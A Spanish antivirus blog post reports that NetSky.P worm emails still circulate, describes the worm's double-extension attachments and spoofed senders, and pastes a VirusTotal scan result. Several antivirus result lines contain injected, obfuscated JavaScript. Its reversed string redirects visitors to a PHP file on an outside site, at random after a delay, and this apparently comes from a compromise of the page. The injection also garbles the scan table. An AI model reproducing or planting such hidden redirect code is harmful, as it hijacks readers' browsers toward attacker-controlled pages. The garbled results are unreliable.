Aun llegan mails anexando NETSKY.P
Desde primeros del 2004 hasta finales 2006 tuvimos una serie de NetSky que fuimos controlando con el ELINETSA, del que llegamos a hacer 42 versiones para las variantes que iban saliendo, siendo la mas prolifica la “, de la que hoy estan aun llegando mails propagando dicho virus:
Entre sus picardias caben señalar que usa doble extension para los ficheros que anexa, para que no parezcan ejecutables, por ejemplo .doc ……….. .pif , y los .pif, al igual que un bat o los cmds, son ejecutados como los EXE
Y otra de sus particularidades es que usa tecnicas spoofing para el envio de mails, de forma que falsea el remitente, y asi aparente proceder de otro ordenador, que logicamente no estará infectado ni sabrá nada de este virus, y es éste quien recibirá las broncas de los receptores de “sus” mails, asi como recibirá devueltos los que no hayan llegado a su destino, por “DELIVERY FAILED”, lo cual aun hoy muchos días recibimos consultas al respecto.
Hoy hemos recibido un mail con este anexado:
File name: document04_virus.doc […].pif
Submission date: 2010-11-29 12:39:34 (UTC)
Current status: queued (#1) queued (#2) analysing finished
Result: 43/ 43 (100.0%)
VT Community
malware
Safety score: 0.0%
Compact Print results Antivirus Version Last Update Result
AhnLab-V3 2010.11.29.03 2010.11.29 Win32/Netsky.worm.29568
AntiVir 7.10.14.131 2010.11.29 Worm/Netsky.AP
Antiy-AVL 2.0.3.7 2010.11.29 Worm/Win32.NetSky
Avast 4.8.1351.0 2010.11.29 Win32:Netsky-AF
Avast5 5.0.594.0 2010.11.29 Win32:Netsky-AF
AVG 9.0.0.851 2010.11.28 I-Worm/Netsky
BitDefender 7.2 2010.11.29 $NfI=function(n){if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to:W32/Netsky.P@mm”>W32/Netsky.P@mm
Comodo 6884 2010.11.29 Worm.Win32.Netsky.Q
DrWeb 5.0.2.03300 2010.11.29 Win32.HLLM.Netsky.18401
Emsisoft 5.0.0.50 2010.11.29 Email-Worm.Win32.NetSky!IK
eSafe 7.0.17.0 2010.11.29 Win32_Netsky_Q
eTrust-Vet 36.1.8006 2010.11.29 Win32/Netsky.P
F-Prot 4.6.2.117 2010.11.28 $NfI=function(n){if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to:Win32.Netsky.P@mm”>Win32.Netsky.P@mm
Fortinet 4.2.254.0 2010.11.29 $NfI=function(n){if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to:Win32.Netsky.P@mm”>Win32.Netsky.P@mm
Ikarus T3.1.1.90.0 2010.11.29 Email-Worm.Win32.NetSky
Jiangmin 13.0.900 2010.11.29 I-Worm/NetSky.q
K7AntiVirus 9.69.3103 2010.11.27 EmailWorm
Kaspersky 7.0.0.125 2010.11.29 Email-Worm.Win32.NetSky.q
McAfee 5.400.0.1158 2010.11.29 $NfI=function(n){if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}to:Netsky.P@mm”>Netsky.P@mm
nProtect 2010-11-29.01 2010.11.29 Worm/W32.NetSky.29568
Panda 10.0.2.7 2010.11.28 W32/Netsky.P.worm
PCTools 7.0.3.5 2010.11.29 Email-Worm.NetSky
Prevx 3.0 2010.11.29 High Risk Worm
Rising 22.75.06.00 2010.11.29 Worm.Mail.NetSky.la
Sophos 4.60.0 2010.11.29 W32/Netsky-P
SUPERAntiSpyware 4.40.0.1006 2010.11.29 Worm.Netsky-P
Symantec 20101.2.0.161 2010.11.29 todos los demas: McAfee 5.400.0.1158 2010.11.29 __________
NOTA: Los interesados en información sobre contrato de soporte Asistencia Tecnica de SATINFO y/o licencia de uso/actualizaciones de sus utilidades, contacten con info@satinfo.es
__________
Este blog no se hace responsable de las opiniones y comentarios de los textos en los que se cita la Fuente, ofreciendo su contenido solo para facilitar el acceso a la información del mismo.
Los comentarios están cerrados.